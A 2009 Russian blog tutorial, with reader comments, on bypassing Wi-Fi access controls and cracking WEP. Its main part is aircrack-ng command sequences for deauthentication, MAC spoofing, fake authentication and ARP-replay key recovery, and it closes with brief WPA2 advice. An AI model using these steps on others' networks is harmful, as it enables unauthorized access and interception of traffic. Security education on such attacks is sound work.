Пользователь
0,0
рейтинг
25 января 2009 в 11:34

Разработка → Атаки на беспроводные сети. Часть 1

В прошлой статье о беспроводных сетях мы рассмотрели первый этап — сбор информации, или wardriving. Сейчас же, продемонстрируем несколько способов получения несанкционированного доступа к беспроводным сетям, а также рекомендации по защите от них.



Сначала перечислим варианты защиты, которые могут быть использованы на точке доступа для ограждения сети от чужих пользователей:
  1. SSID Cloaking — скрытие имени сети. Доступ разрешается только клиентам, которые знают это имя.
  2. MAC Filtering — фильтрация по MAC адресам. Доступ разрешается только клиентам, адреса сетевых адаптеров которых записаны в точке доступа.
  3. Shared key Authentication — аутентификация с общим ключом. Доступ разрешается лишь тем клиентам, которые прошли проверку, используя общий ключ.

Важно отметить, что эти методы не обеспечивают конфиденциальности данных, передаваемых по сети, они просто ограничивают доступ к сети. То есть, даже если все эти средства включены на точке доступа, злоумышленник сможет, включив свой беспроводной адаптер в «monitor mode», слушать эфир и вылавливать всю передаваемую информацию. Следующие методы криптографически защищают данные:
  1. WEP — статистически самый используемый метод защиты беспроводной сети. Предоставляет шифрование всех передаваемых по сети данных. Аутентификации, как таковой не имеет — если вы не знаете ключа, вы не сможете расшифровать данные. Недостаток этого метода — очень слабый алгоритм, ключ взламывается злоумышленником менее чем за 5 минут.
  2. WPA и WPA2 Pre-Shared Key — сильная система аутентификации и шифрования данных. Доступ производится через общий ключ. Уровень защиты равен сложности общего ключа, так как система подвержена brute force атакам.
  3. WPA и WPA2 Enterprise — вариант предыдущей системы, но для подтверждения личности используется внешний аутентификатор 802.1x EAP, что позволяет использовать сертификаты, смарт карты и т.д.

Сегодня мы рассмотрим обход первых четырех систем защиты. Основной инструмент для подобных манипуляций — программный пакет Aircrack-ng suite. Мы рекомендуем использовать ОС Linux, так как этот пакет более развит в Linux версии, и что более важно — подходящие драйверы, позволяющие атаковать беспроводные сети, более широко представлены под Linux (На Windows платформах поддерживаются только адаптеры компании CACE — Airpcap). Подробные инструкции по установке правильных драйверов и самого Aircrack-ng вы найдете здесь. Теперь приступим к самому процессу.

Для удобства в дальнейшем будем использовать такие обозначения:

00:aa:aa:aa:aa:aa — MAC адрес точки доступа

00:cc:cc:cc:cc:cc — MAC адрес подключенного к этой точке клиента

00:ff:ff:ff:ff:ff — MAC адрес нашего адаптера

wlan0 — имя нашего беспроводного интерфейса

1.Обход SSID Cloaking


При подключении к точке доступа, на которой активировано скрытие имени, клиент всегда отправит это имя. Поэтому нам достаточно дождаться одного клиента и все. Для этого запускаем

airodump-ng wlan0 -c <канал, на котором находится точка доступа>


и если в крайней колонке вы видите <Length:X>, где Х — некое число, то эта сеть скрывает свое имя. Далее нужно подождать немного, пока кто-то подключиться, и тогда значение в колонке изменится на имя сети автоматически. Либо, если долго не удается ничего словить, то можно запустить деаутентификацию командой

aireplay-ng wlan0 -0 100 -b 00:aa:aa:aa:aa:aa, где 100 — количество деаутентификаций клиентов


Эта операция начнет рассылать пакеты, приказывающие клиентам, подключенным к точке доступа, отключиться от нее. Они отключатся и через несколько секунд начнут подключаться вновь, отсылая в запросе на подключение имя сети. Соответственно airodump-ng его сразу покажет. Для большей эффективности деаутентификации лучше атаковать конкретного подключенного клиента

aireplay-ng wlan0 -0 100 -b 00:aa:aa:aa:aa:aa -с 00: сс: сс: сс: сс: сс

Также для целей раскрытия имени сети можно использовать kismet. Эта программа автоматически выдает имя сети при подключении к ней клиента.

2.Обход MAC Filtering


Для подключения к точке доступа, которая фильтрует пользователей по MAC адресу их адаптера, необходимо знать лишь MAC адрес уже подключенного клиента. Зная адрес, в ОС Linux выполните

ifconfig wlan0 down

ifconfig wlan0 hw ether 00:cc:cc:cc:cc:cc

ifconfig wlan0 up

либо для OC Windows, воспользуйтесь утилитой MAC changer. Далее необходимо дождаться пока

легитимный клиент отключится, и тогда подключиться, либо использовать атаку деаутентификации на легитимного клиента.

3.Обход Shared Key Authentication


Если вы пытаетесь проделать фальшивую аутентификацию командой

aireplay-ng wlan0 -1 4000 -a 00:aa:aa:aa:aa:aa

и вместо сообщения об успехе получаете

Sending Authentication Request
AP rejects open-system authentication
Please specify a PRGA-file (-y),

то необходимо получить екземпляр аутентификации с общим ключом. Программа airodump-ng это умеет. Запускаем её и ожидаем, пока поле AUTH для выбранной сети не станет равно SKA. Это значит, что программа словила аутентификацию и сохранила ее в файл с именем sharedkey-*.xor. Далее выполняем

aireplay-ng -1 4000 -e <имя сети> -y sharedkey-<ваш файл>.xor -a 00:aa:aa:aa:aa:aa -h 00:ff:ff:ff:ff:ff wlan0

и вы аутентифицируетесь. Если же долго не появляется SKA в airodump-ng, то можно, как и в случае с раскрытием имени, деаутентифицировать существующего клиента.

4. Взлом Wep ключа


Алгоритм шифрования используемый WEP еще в начале этого века был взломан, и после этого уже несколько раз в нём находились еще большие уязвимости, позволяющие восстанавливать ключ шифрования еще быстрее. Первая программа, осуществляющая взлом WEP ключа, называлась airsnort и могла это сделать, словив 8-10 миллионов пакетов. Позже, aircrack-ng это позволяла сделать в 10 раз быстрее. А в 2005 году с приходом aircrack-ptw необходимое количество пакетов уменьшилось до 20-80 тысяч, в зависимости от длины ключа.

Для того, чтобы не ждать, пока адаптер словит 80 000 пакетов, мы будем эти пакеты генерировать сами. И самый лучший для этой цели пакет — ARP. Его можна добыть несколькими способами. Но начнем мы с фальшивой аутентификации, без которой точка доступа будет просто игнорировать наши отправляемые пакеты.

aireplay-ng wlan0 -1 4000 -a 00:aa:aa:aa:aa:aa


И запускаем Airodump-ng, чтоб сохранять пакеты

airodump-ng wlan0 -c 6 -w save, где 6 — канал сети, save — сохранение

Далее самый простой способ:

aireplay-ng wlan0 -3 -a 00:aa:aa:aa:aa:aa

В этом случае адаптер ловит пакеты и ожидает ARP пакеты. Когда же он появится программа, автоматически начинает его ретранслировать, генерируя новые пакеты, необходимые нам для взлома ключа. После этого запускаете программу:

aircrack-ng save-*.cap


и ждете пока она вам не выдаст ключ сети.

Так же можно самим создать этот ARP пакет. Для этого нам понадобится поток ключа (keystream). Достать его можна двумя способами. Первый — chop-chop атака, более медленная но срабатывает чаще.

aireplay-ng wlan0 -4 -b 00:aa:aa:aa:aa:aa

Вскоре программа словит пакет и, если его размер больше 56 байт, можете нажимать 'y'. Через некоторое время поток будет добыт и сохранен в replay_dec-*.xor. Если же программа выдала ошибку, попробуйте запустить её так:

aireplay-ng wlan0 -4 -b 00:aa:aa:aa:aa:aa -h 00:ff:ff:ff:ff:ff

И обязательно перед этим запустите фальшивую аутентификацию.

Другой вариант — фрагментационная атака. Она значительно быстрее, но работает не на всех точках доступа.

aireplay-ng wlan0 -5 -b 00:aa:aa:aa:aa:aa

После успешного выполнения вы также получите файл fragment-*.xor

Далее, имея файл с потоком ключа, мы создаем пакет:

packetforge-ng -0 -a 00:aa:aa:aa:aa:aa -h 00:ff:ff:ff:ff:ff -k 255.255.255.255 -l 255.255.255.255 -y <файл с потоком> -w arp, где arp — файл для сохранения пакета.

Теперь мы этот пакет будем постоянно отправлять:

aireplay-ng wlan0 -2 -r arp

И также, как и в первом варианте, запускаем aircrack-ng и ожидаем вывода ключа сети.

5.Защита


Как видите, все эти 4 метода имеют уязвимости и легко обходятся, так что даже комбинация SSID cloaking + Mac filtering + SKA +WEP займет у злоумышленника больше времени, но в итоге своего он добьется. Поэтому мы рекомендуем использовать исключительно WPA2 с длинными ключами в случае PSK и надежной системой внешней аутентификации в случае WPA2-Enterprise. Остальные методы не предоставляют достаточного уровня безопасности.

В следующей статье мы рассмотри более экзотические атаки на WEP (caffe-latte, client fragmentation и подключение к сети, не зная wep ключа), а также атаки на WPA и способы защиты от них.
Вадим @n3m0
карма
38,5
рейтинг 0,0
Пользователь
Реклама помогает поддерживать и развивать наши сервисы

Подробнее
Реклама

Самое читаемое Разработка

Комментарии (98)

  • 0
    вы автор? зачем постить сюда статью которая была опубликована полгода назад на другом ресурсе?

    glaive.org.ua/articles/231/wireless-atacks/

    простой ссылки не было бы достаточно? кроме того вы умолчали что статья старая и что этот пост по сути кросспостинг, даже если вы — автор
    • +6
      прочитал выш коммент к предыдущей статье, понял что статья ваша
      все-таки стоит делать сноску или введение о том, что статья была уже опубликована

      статья отличная, вы с вашей командой молодцы
    • +5
      Статья старая, но актуальная!

      Я публикую от лица Glaive Security Group! Я один из основателей!
      • +5
        Я понимаю, когда заметку пишут прямо на сайт — трудно избежать ошибок. Но за такой продолжительный срок — публиковать на разных сайтах ни разу не перечитать статью!?
        екземпляр
        можна
        • 0
          Ну и до кучи — «словить» и «впоймать» — это просторечие.
  • 0
    Статья отличная… но теперь ждем новую волну взлома беспроводных сетей… Ведь по мимо указания явных уязвимостей в качестве сигнала администраторам сетей, это отменный мануал на тему — «как „наказать“ нерадивого соседа» (или еще кого).
    • +4
      Никакой волны не будет, так как такого рода информация доступна уже не первый день.
  • +1
    Спасибо за информацию. Натолкнули на проделывание нескольких экспериментов :)
  • +7
    Мне эта статья чем то напомнила различные гайды для «кулхацкеров», которые печатают в журнале «Хакер».

    Просто последовательность действий, чтобы разрушить что-то. Полезной информации почти нет. Сделано на уровне «наберите в консоли это, потом вот это и вы будете крутым хакером, взломавшим интернет». Какие такие уязвимости в шифровании WEP, как смогли уменьшить с нескольких миллионов пакетов до нескольких десятков тысяч, что такое фрагментационная атака в данном случае, что такое chop-chop атака, почему она медленнее, но срабатывает чаще?

    По существу вопросы: В Wi-Fi разве нет шифрования с туннелированием? Оно же по идее и спасет от всего этого. Вы кстати тестировали эти способы на практике? — с каким успехом?
    • НЛО прилетело и опубликовало эту надпись здесь
      • –2
        Вы не очень поняли поняли меня.
        я не люблю статьи такого рода по двум причинам.
        1) Их деструктивная направленность без созидания. Их авторы выкладывают на всеобщее обозрение описание того как, взломать систему, причем делают это с поразительной подробностью. Их труд я бы сравнил, например, с разработчиками программ для ДДоС, которые выкладывают их в сеть. Печальным итогом в обоих случаях являются толпы «кулхацкеров» с успехом разрушающих что-то.
        2) Практически полное отсутствие полезной информации, т.е. что безопасно, а что нет. Фактически она есть только в последнем параграфе.

        Подробное описание уязвимостей, подробное описание возможных атак, использующих эти уязвимости, методы защиты от этих атак — вот все что ИМХО необходимо для таких статей.
        • 0
          Ну, дык, там и написано, что все небезопасно кроме как если использовать WPA2-Enterprise. И в виде прекрасного примера показано как легко все ломается если не хотеть давать доступ, а безопасностью пренебрегать. А то ведь выражение «все легко взламывается» сама по себе слишком голословна. Когда такое пишут без примеров, как в этот раз, мне сразу вспоминается описаловка как ставить FreeBSD: «все элементарно, — для установки freeBSD достаточно написать в консоли пять строк и вот вам первая...» — и дальше идет строка где-то под тысячу символов.

          А вообще не по доброму это — закрывать сети. У меня вон, домашний wi-fi стоит без паролей и шифрования — почему бы не давать людям пользоваться инетом если, допустим, меня нет дома или он мне не нужен? Единственное, что я настроил на роутере так это чтоб МАС адрес моего ноута имел наивысший приоритет по доступу в сеть. И даже это не столько против кого-то, кто подключится ко мне сколько против того, чтоб стационарный комп не мог на себя весь инет утянуть.
          • 0
            Ну, дык, там и написано это в последнем абзаце — 5 строк — полезная нагрузка этого поста.

            Прекрасный пример — это не 10-20 консольных команд, которые нужно ввести, чтобы поломать что-то. Прекрасный пример — это, как я написал постом выше, и даже объяснил почему, «подробное описание уязвимостей, подробное описание возможных атак, использующих эти уязвимости».

          • НЛО прилетело и опубликовало эту надпись здесь
            • 0
              Нет. Я в этом не уверен. А на счет того, что отвечать за кого-то, кто через мой wi-fi, по серому IP, делал противоправные действия… — если бы такое хоть где-то в суде прошло бы, так я бы уже был миллионером.
          • 0
            А не смущает пускать кого попало к себе в сеть?
            • 0
              Совсем не смущает. В samba'е расшарена только одна папка с видео, а все остальное закрыто. И что стого, что кто-то зайдет и пошарится в инете? Меня что, от этого убудет? Особенно если учесть то, что инет безлимитный и целый день я на работе… — пусть пользуются пока меня нет.
              • 0
                ну как уже ниже написали — возможны преступления с вашего айпи и ответственность будет на вас, возможно прослушивание канала.
                • 0
                  Так нету у меня постоянного ip, только динамический, меняется не менее трех раз в день. И если бы была за это ответственность, вы не представляете как прекрасна была бы жизнь — никакие следы заметать не надо было бы при взломе банка… лови только ip его работников и подставляй их по мере надобности. :)
                  А прослушавание… у нас, в постсоветских странах осталась у властей привычка следить вразрез со всеми правами человека и за теми за кем не надо и за кем просто так получилось.
          • +1
            А вы дадите свою машину «на покататься» когда она вам не нужна? Я вот не дам.

            Кстати, если сеть без ключа, то любой не только можеи использовать ваш IP для взлома чего-либо и вызвать вам Party Van, но и перехватить то что вы передаёте в/из Интернета, включая пароли и личные данные. Если, вы не будете использовать ssl соединение, то перехватить ваш пароль в жж или на хабр вопрос для любого скрипт-кидди. А такие люди от черезвычайного ЧСВ очень жестоки. Но я уже отклонился от темы :)

            Так что настоятельно советую закрыть точку. Кстати, а между компьютером и ноутом вы, наверное, передаёте файлы через самбу? Если да, то они тоже всем видны.
            • 0
              Нет. Не через самбу. Самба стоит только на одну папку с видео и то раскрыл только чтоб жена не трогала стац.комп понапрасну.

              С машиной не подходящая аналогия. Машину можно банально поломать, украсть и вообще привести в нетоварный вид, а сеть… ее украсть не получится. Если уж брать аналогию с машиной, то это ближе не к дать «на покататься», а к тому как мы подвозим попутчиков. Вот вы подвозите людей, просто так, за бесплатно? Я — да.
              • 0
                Продолжая аналогии, вы возьмёте себе в машину ночью человека в маске и ножом в руке? :) Бесплатно ещё к тому же.
                • 0
                  Нет. Хотя, может он человек хороший :)
                  Вы просто слишком много плохого видите в этом.
                  Конечно, есть некоторые проблемы с паролями, но на то есть туннели, VPN и вообще ssl решает почти все проблемы. Была бы у меня секретная инфа в сети — было бы и шифрование. Но я вам скажу, что наша жизнь все одно публична и не стоит на этом заморачиваться. Мне может немного легче так жить чем вам — домашний телефон родителей прослушивался все время, пока СССР не развалился и каждый шаг был на виду…
                  А на счет паролей, их взлома — есть прекрасный ключ практически к любому паролю — паяльник в жопе. Т.ч. привыкайте жить публично. :)
                  • 0
                    >домашний телефон родителей прослушивался все время, пока СССР не развалился

                    Ой, только не надо страшилок :) Я тоже не люблю комми, но надо же так грубо. Тем более, как будто сейчас прослушать телефон так сложно. Кстати, это одна из причин по которым я не использую проводной телефон.

                    Про паяльник вы правы, но я же толкую про скрипт-кидди, они таким не занимаются, это во-первых. Во-вторых, на военной кафедре есть «сектретность». Конечно, там рассказываю то что можно найти в интернетах за 10 минут, но это приучает к аккуратности и мерам безопасности.

                    Если бы народ не сидел под админом, если бы не запускал бы сомнительные файлы из почты или инета, если бы не ставил пароли типа 1111 было бы меньше ботнетов, меньше спама, меньше DDoSов. Так что секурность она всем лучше, чем без неё.

                    BTW, я никогда бы не воспользовался бы окрытой точкой без использования VPN. Мало ли что скрывается за этой удочкой.
                    • 0
                      Тогда прослушивали по причине того, что отец был на ответственной гос. должности. И после СССР тоже. Правда, потом можно было и свое досье себе забрать. Хоте не факт, что не оставались копии :) Я вообще про СССР написал в виде примера того, что глупо скрывать то, что скрывать не имеет большого смысла и, с другой стороны, если требуется секретность то уж надо напрячься и начать ее соблюдать. Кстати, на одной из моих предыдущих работ для документов на неразглашение стоял отдельный комп в отдельной комнате, без сети и вообще. Добраться до него было посложнее чем в фильме «миссия невыполнима», так кажется называется :)))

                      А я разве не писал про vpn? Не… — писал, но как-то вскользь.
            • 0
              И, кстати, на счет покататься. Я часто езжу на чужих машинах. Бывает такое, что вот поставил машину в пятницу в гараж (а до него 20 минут езды), а в понедельник нет времени ехать за ней, так беру чужую машину (у кумовей) и, в разумных пределах могу поездить. И свою бы я им тоже дал, но не складывается (либо она мне нужна и стоит под подъездом, либо не нужна и в гараже — далеко).
              • +1
                Ну то родственники! У меня тож самое :) А вообще всех надо на керберос пересадить
                • 0
                  На счет того, что самбой пользоваться не надо — это правильно. Вот жену пересажу волевым решением на ubuntu и у меня самба исчезнет как память о темных веках :)
                  И кумовья — это не родственники. Не совсем. Или совсем не. :)
                  • 0
                    А nfs разве шифруется?
  • +1
    Держу открытый SSID и WPA2 с ключом на 2048-битным ключом. Где могут поломать?
    • +4
      В прокуратуре, руки :)
      • 0
        Не надо клеветать на белую и пушистую прокуратуру — для этого есть специально вырощенные уникумы в отделениях милиции :)))
  • +1
    А у меня открытая сеть, никаких паролей.
    • +2
      Спасибо!
      Побольше бы таких щедрых и бескорыстных людей!
    • 0
      У меня тоже, но я на 13 этаже, так что ко мне за год подключился только 1 айфон.
    • 0
      а где вы живете? мы едем к вам :-)
    • 0
      Хм. За пароли свои не боитесь? Стырят ведь — к почте, к хостингу и т. д.
      • 0
        Как???

        У меня сеть тоже открыта, но не компы…
        • НЛО прилетело и опубликовало эту надпись здесь
          • 0
            разве пароли от аськи передаются открыто?
            насколько я представляю пароль влетает в канал при регистрации (по SSL соединению), а дальше никакх паролей — одни хеши
      • 0
        У меня тоже точка доступа без пароля, часто через меня тянут что-то — но я не жадничаю. А вот то, что пароли стырят — будет неприятно. Как от этого защититься, оставив точку открытой?
        • 0
          У меня нет опыта в этой области, но я подозреваю, что нужно включить шифрование WPA, и поставить галочку «ключ предоставлен автоматически».
        • +3
          Наверное можно защититься создав VPN туннель между тобой и роутером. Люди будут заходить на прямую, а ты будешь заходить через VPN туннель. Правда не на каждом роутере есть возможность создания туннелей.
          • 0
            у меня точка тоже открытая, но весь доступ к роутеру только через впн
  • –2
    где же ты был, когда я с этим разбирался и переводил все с англиского :)))
    интересно, почему в ходу нет ни одного графического интерфейса для airodump…
  • +2
    По теме могу добавить, что существует отличный инструмент для анализа и взлома беспроводных сетей backtrack. Представляет из себя live дистрибутив GNU/Linux.
    • +2
      да. есть еще nUbuntu :) тож самое по сути, но на базе бубунту
      • 0
        Спасибо за наводку, скачал дистр, щас буду изучать безопасность своей домашней вайфай сети :)
  • 0
    Спасибо большое, вот этого не знал:

    «Для того, чтобы не ждать, пока адаптер словит 80 000 пакетов, мы будем эти пакеты генерировать сами»

    Теперь дело пойдёт быстрее)
  • 0
    Статейка как раз к моей покупки — Eee PC 701.
    • НЛО прилетело и опубликовало эту надпись здесь
  • +1
    WEP — это не серьёзно! жду статью про WPA
    • 0
      Но тем не мнее еще остались беспроводные сети которые используют WEP авторизацию, что конечно идет как минус к безопасности такой сети…
      • 0
        На данный момент вижу около 12 точек) WEP нету нигде, хотя безусловно, если поездить по городу( Москва ) то и с WEP шифрованием найдётся много.
        • 0
          :)
          glaive.org.ua/kiev-wifi-map/
          Это только центр, и давно не обновляли. На днях добавим ещё около тысячи точек
          • –4
            с начало смотрю и не понимаю, что за район такой не понятный, а это оказывается Киев=)
            • +5
              Ага, оказывается, кроме москвы тоже ещё есть города… :)))
        • +1
          У меня ситуация прямо противоположная. Видно штук 15 точек из них 2 WPA 10 WEP, остальные без защиты и с доступом по admin admin.
    • 0
      Я так понимаю, в блоге Glaive Security Group они уже опубликованы ;)
      • 0
        Правильно понимаете. Мы хотим старые статьи перенести сюда, а также опубликовать уникальные, новые статьи, и некоторые уязвимости на крупных сайтах!
        • 0
          Хорошее решение. Тематика статей интересна — они будут вызывать достойное обсуждение (что для авторов статей всегда приятно).
  • +1
    О чем вы вообще? Уровень ит грамотности подавляющего большинства пользователей стремится к нулю!
    В каждом дворе сейчас видны под десяток точек, одна-две из которых зачастую просто открыты!
    У меня подруга полгода пользовалась интернетом на своем лэптопе, не только не зная куда он подцепился, но и искринне считая, что так и должно быть:
    «ну мне же консультант при покупке сказал что в лэптопе есть ви-фи, значит будет инет»!
    • 0
      видел где-то скриншот со списком доступных сетей. Одна открытая сеть называлась что-то вроде «Хватит воровать мой интернет» :)
    • +1
      а много ли людей, которые сами могут починить свой тв, стиральную машину, утюг, ориентируются в лесу, умеют правильно и вкусно готовить, знают законы, умеют правильно пользоваться столовыми приборами, умеют танцевать, правильно говорить на своем родном языке, разбираются в искусстве, литературе, моде, знают столярное и слесарное дело и т.д. и т.п.

      ответ конечно же отрицательный и это нормально — так устроен мир.
  • 0
    Возможна ли реализация на Windows-платформе?
    • 0
      Конечно возможна. Правда мы не тестировали как работет. Вот здесь мжно скачать версию под Виндовс www.aircrack-ng.org/doku.php?id=install_aircrack&DokuWiki=8ce9b4283f4b0990d85751aa8ca41562
    • +1
      Кое-какие инструменты доступны и на windows-платформе, но большинство утилит заточены непосредственно для использования в GNU/Linux дистрибутивах, а если и есть сборки под Windows, то больший функционал реализован именно в GNU/Linux среде. Используйте live дистрибутивы и не утруждайте себя установкой Linux и необходимого инструментрия. Это уже сделали до Вас :)
      • 0
        Да и VMWare хватит под эти цели. Правда подружить её с WiFi можно только с USB.
        • 0
          Если заниматься этим серьезно (мониторинг сети, анализ уязвимостей, взлом наконец), то лучше все же использовать live сборки на ноутбуке без использования виртуальных машин. Это позволит быть мобильным и иметь более-менее серьезные инструменты.
          А если возникло желание поиграться, то и на Windows можно получить неплохой функционал.
          • 0
            Профессионально — это уже УК РФ. Поиграться — этого хватит :)
            • 0
              Профессионально этим можно заниматься работая специалистом по безопасности и работая со своей сетью. Все остальные случаи на самом деле под статьей ходят.
  • –1
    Подскажите, плз, какой-нибудь простой и удобный wi-fi сканер «эфира» под винду?
    • 0
      хочешь взломать интернеты?
      • 0
        Если вам нечего посоветовать — проходите мимо, товарищ, со своими подколами.
        • 0
          ну вы даже не постарались поискать то, что вам надо самостоятельно.
          Хотите чтобы вам сразу дали ссылку на программу с большой кнопкой «взломать!».
          Как вас не подкалывать? :))
          • 0
            Товарищ, повзрослейте уже. Не все хотят играть в кул-хацкеров как вам может казаться.
  • –3
    Ненавижу таких авторов, потом всякие дети берут и ломятся к тебе, и приходиться уже беспокоиться, чтобы эти «умники» начитавшиеся такие статьи не смогли пробраться в сеть.

    Меня как среднего пользователя не очень радуют такие вот статьи.
    Я сижу себе спокойно через свой роутер, а в итоге потом какойто маленький урод будет ломиться мне на точку и из-за таких авторов как вы мне прийдется искать методы борьбы от них.

    Как уже писали выше побольше теории, а то сделать то сделаеш, а что делал не поймеш…
    • +3
      Интересно вы мыслите… Такие статьи мы пишем, что бы люди с такими как у вас утверждениями, почитали и защитились от «маленьких уродов». И в принципе, этот материал всем известен, просто мы хотим среднему пользователю донести это. Правда, вот такими методами
      • –1
        В цивилизованных странах мира такие методы донесения если и используются, то только из подполья.
        • –1
          Чего минусуете? вы найдите хотя бы одну статью, написанную не анонимно, в зарубежных источниках, которая открытым текстом до подробностей описывает процесс взлома. Вы также не найдете аналогов журналу Хакер, который такими же варварскими методами сообщает владельцам банков, почтовых серверов об обнаруженных у них уязвимостях.
          • +1
            Если брать аналогию с машиной, то не будите же вы оставлять машину открытой на улице и с ключами в замке? Скорее всего нет. Так почему же оставляют всякие уязвимости в сетях там, где их быть не должно? Эта статья показывает типа: «если вы оставили машину открытой и с ключами в замке, то прикрывание двери газетой с надписью ВХОДА НЕТ не гарантирует вам того, что эту машину кто-то не украдет — вместо газетки пользуйтесь… и т.д. и т.п.».
            • –1
              Какое отношение это имеет к тому, что я написал выше, я что-то имел против того что вы написали?
              Вы что несогласны с тем, что такие методы сообщения об уязвимостях являются неприемлемыми?

              • 0
                Да, я не согласен с тем, что такие методы являются неприемлемыми. Я не знаю, что там пишется в журнале Хакер, — не читаю, но если там пишется что-то типа: у вас вход в админку: ID:login, Password:password, то так и надо тем, что такое понаставил. Пусть делают по нормальному.
                • 0
                  вы уже второй раз приводите неправильную аналогию — одно дело это халатность и пофигизм, другое — уязвимость по случайной ошибке.
                  То есть вы считаете нормальным, если кто-то где-то опишет детальный пошаговый взлом, например, банка?
                  • +1
                    Если это опубликует, например, служба безопасности банка — это ненормально, а если кто-то другой напишет как взломать банк, сейф, вскрыть российскую (или украинскую) машину — это я считаю нормальным. А если напишут как в два приема вскрыть мой лексус — я буду в восторге и сразу же помчусь ставить на него что-то, чтоб это предотвратить. Или напишут как на раз получить логин\пароль от какого-нибудь Приват24 — я перестану им пользоваться, по крайней мере, я буду в курсе того, чем я рискую.
                    Лучше уж знать, а не получать от жизни по башке от незнания.
                    Да, предыдущая аналогия в таком случае не сильно подходит. Давайте возьмем в виде аналогии образ страуса, засовывающего голову в песок? Между прочим, прекрассный метод — ты не видишь проблемы… правда, проблема видит тебя :)
                    • 0
                      Тут опять неверно:) Откуда вы узнаете, что кто-то написал, про то, как взломать вашу машину? Так же и большая часть пользователей вай-фая, являющихся неискушенными в компьютерах людьми никогда не узнает о существовании этой статьи и о том, что используемые ими методы небезопасны.
                      • 0
                        Ну вот, если допустить, что мы ничего плохого не знали про WEP — вот из этой статьи и узнали бы и если не хотим давать доступ к инету — ставим WPA2.

                        Это уже другой вопрос — распространение информации и доступ к ней. Поиск инфы личное дело каждого. Эту статью могли прочитать как малолетне-деструктивные-куль-хацкеры, так и люди которые не были посвящены в эти вопросы безопасности.

                        В общем, из нематериального, в первую очередь владение информацией ведет к покорению мира :)))
                        • 0
                          Так дело в том, что существует способ подачи такой информации, который является своего рода компромиссом. Я его уже предлагал — описание уязвимостей, процесса атак на высоком семантическом уровне в противоположность детальной реализации. Если бы информация была подана именно так, то во-первых, у всех читающих пост в голове бы что-нибудь отложилось о подобных атаках, появилась бы информация к размышлению, можно было бы задуматься (после прочтения текста, состоящего из консольных команд меня на размышления никак не тянет). Единственное что сейчас запоминается из поста — это то, что нужно юзать WPA2. А во-вторых, это бы спасло от кулхацкиров, которые навряд ли напишут тулзы для реализации атак.
                          • 0
                            Ладно. Не будем спорить. В общем-то мы об одном и том же.

                            ps. Но все же лично мне консольные команды в виде конкретного примера лучше доходят до мозга, чем абстрактные и высокосемантизированные конструкции для выражения простых… скажем, постулатов.
                            Явное лучше неявного. А для генерирования абстрактных концепция у меня есть мозг, который мало что запоминает, но хорошо улавливает суть :)))
          • 0
            Первое, что из ебуков на винте попалось:

            Prentice Hall: «How Secure Is Your Wireless Network? Safeguarding Your Wi-Fi LAN by Lee Barken»
            ***Chapter 4. War Driving: Tools and Techniques

            Prentice Hall: «Wi-Foo. The secrets of wireles hacking.» русское издание «Wi-Фу. Боевые приемы взлома и защиты беспроводных сетей.»

            Дальше искать лень.
      • 0
        Тогда почему так мало советов по защите? Зато взлом описан пошагово и со скринами даже…
  • НЛО прилетело и опубликовало эту надпись здесь
  • 0
    Зачем писать ещё про взлом WEP? Ясно же, что WEP — говно. А то получается: «Взломали WEP вот так, а ещё его можно взломать вот так, а ещё можно вот так» — и что дальше-то? :-)
    • +1
      Понимаете, чем больше мы будем писать такое, тем больше людей будут понимать, что использовать WEP плохо. А то сейчас ситуация заставляет плакать…
      • 0
        Тогда уж надо писать об этом не на Хабре, а на сайте типа Стрим.ру, например — объясняя на пальцах и с яркими картинками :-)
  • 0
    Спасибо, интересно )
    Авось заморочусь проверкой своей (:
  • 0
    cпасибо
  • 0
    «необходимо знать лишь MAC адрес уже подключенного клиента»
    Вот это можно поподробней? Как узнать mac адрес подключенного клиента, не имея доступа к данному компьютеру?

Только зарегистрированные пользователи могут оставлять комментарии. Войдите, пожалуйста.